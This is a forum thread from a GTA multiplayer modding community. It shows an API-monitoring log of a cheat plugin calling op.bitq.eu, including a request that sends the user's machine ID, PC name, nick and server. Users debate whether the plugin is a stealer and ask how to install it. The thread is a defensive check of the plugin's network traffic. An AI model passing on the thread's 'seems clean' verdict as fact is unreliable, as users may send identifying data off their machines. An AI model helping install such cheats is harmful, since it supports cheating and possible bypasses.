[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/OP-HaX_info.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 17:12:51]ID 1281783249, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
Своего пароля тут не нашёл

А тут и не будет писать пароль, если будет стиллер, то будет писать что за сайт, название там, вроде бы чисто, что за собейт юзаешь или что там d3d9.dll

 

[Mike_Sanderson]

Как установить?

 

[Ren_Boyko]

Как установить?

В корневую папку игры

 

[Pakulichev]

@DarkP1xel outdated из-за bypass'ов или просто поддержка всё?

 

[SNAID]

Скажите, есть повод для беспокойства?